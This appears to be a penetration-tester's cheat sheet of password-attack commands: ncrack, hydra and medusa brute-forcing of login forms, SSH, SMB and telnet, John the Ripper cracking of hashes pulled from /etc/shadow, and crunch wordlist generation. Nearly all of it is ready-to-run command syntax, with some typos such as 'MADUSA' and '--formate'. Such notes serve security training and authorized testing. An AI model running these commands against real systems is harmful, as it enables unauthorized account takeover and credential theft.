Authentication Crackers

  • NCRACK
  • HYDRA
  • MADUSA
  • JOHN THE RIPPER

NCRACK

ncrack [service name]://IP_Address:PortNumber 

ncrack telnet://10.80.30.50:25

EX: ncrack -user raj -P /root/Desktop/pass.txt 192.168.0.104:445

EX: ncrack -U /user/share/pass.txt -P /root/Desktop/pass.txt 192.168.0.104:445

Hydra:

hydra targetWebsite http-post-form "/login.php:user=^USER^&pwd=^PASS^:invalid credentials" 
-L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt -f -v


hydra 192.168.2.4 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -v


------------------------------------------------------------------------------------------------------------
SMB BRUTEFORCE:
-------------------------------------------------------------------------------------------------------------

Medusa:

medusa -M [protocol] - q |  -q to display the module usage information

Ex: medusa -M [telnet] - q

medusa -M [protocol] -h [Target IP] -U username.lst -P password.lst -v

John

Unshadow

  • unshadow /etc/passwd /etc/shadow
    >
    hashes.txt

  • john --wordlist=/usr/share/john/password.lst hashes

  • John --show hashes

Note: to use John with custom wordlist, save the words in the same file john uses [password.lst]__

  • John --wordlist=/usr/share/john/password.lst --formate=raw-md5 hashes.txt | specify the hash formate
    important

  • John --wordlist=/usr/share/john/password.lst --formate=NT hashes.txt | specify the hash formate
    important

  • john --wordlist=/usr/share/john/password.lst --format=RAW-MD5 /root/Desktop/hashes.txt

Crunch

Custom Wordlist with alpha characters at the beginning and numerics at the end

  • crunch 13 13 -f /usr/share/crunch/charset.lst numeric -t SKY-PWDS-@@@@ > /usr/share/john/password.lst

results matching ""

    No results matching ""